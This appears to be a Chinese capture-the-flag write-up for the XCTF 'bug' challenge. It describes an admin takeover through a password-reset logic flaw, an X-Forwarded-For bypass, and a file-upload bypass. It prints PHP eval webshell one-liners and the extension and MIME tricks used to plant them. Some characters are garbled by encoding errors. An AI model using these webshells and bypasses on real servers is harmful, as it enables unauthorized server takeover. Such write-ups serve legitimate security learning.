題目：

進(jìn)去后發(fā)現(xiàn)如下所示：

我注冊(cè)了一個(gè)peak賬號(hào)，登錄后顯示如下：

經(jīng)過(guò)一番測(cè)試，發(fā)現(xiàn)Manage需要admin權(quán)限：

如何獲取admin權(quán)限呢？利用修改密碼界面的邏輯漏洞，修改admin的密碼，如下：

再次點(diǎn)擊Manage會(huì)出現(xiàn)

我們使用XFF繞過(guò)IP限制
X-Forwarded-For：簡(jiǎn)稱XFF頭，它代表客戶端，也就是HTTP的請(qǐng)求端真實(shí)的IP

<!--index.php?module=filemanage&do=???--> 這個(gè)明顯是讓我們猜，這里最后根據(jù)前面filemanage(文件管理)，猜到upload(上傳)

嘗試上傳一個(gè)peak.php文件：<?php @eval($_REQUEST[peak]);?>

發(fā)現(xiàn)無(wú)法上傳，被判斷為php文件，通過(guò)在上傳時(shí)可以抓包，可以發(fā)現(xiàn)是后端驗(yàn)證，嘗試00截?cái)?#xff1a;

再猜測(cè)可能是過(guò)濾代碼中的特殊字符，例如?，那我們將peak.php內(nèi)容修改為：<script language="php">@eval($_REQUEST[peak])</script>，再次上傳，00截?cái)嘁膊籵k，依舊未果，還能咋辦？
最后發(fā)現(xiàn)php4和php5可以上傳但返回不是圖像…好！那我們就修改MIME

修改文件名為peak.jpg，結(jié)果不行！那就是peak.php的內(nèi)容有問(wèn)題，目標(biāo)服務(wù)器有過(guò)濾，那我們繼續(xù)使用<script language="php">@eval($_REQUEST[peak])</script>來(lái)繞過(guò)，得到flag

---

注：經(jīng)測(cè)試
（1）如果你的peak.php5文件內(nèi)容中沒(méi)有任何php內(nèi)容還不行，例：

（2）文件必須能被php解析執(zhí)行

總結(jié)：這題主要考查

• 對(duì)邏輯漏洞的認(rèn)識(shí)
• 對(duì)敏感目錄的猜測(cè)
• 文件上傳的繞過(guò)(需要注意的是，有時(shí)候常用的一句話木馬，有可能會(huì)被過(guò)濾！)
• 繞過(guò)要求：MIME類型是圖片；文件名能被php解析執(zhí)行；文件內(nèi)容既要是php文件，而且你php文件中的內(nèi)容還不能這么明顯，難搞哦

總結(jié)

以上是生活随笔為你收集整理的XCTF-高手进阶区：bug的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。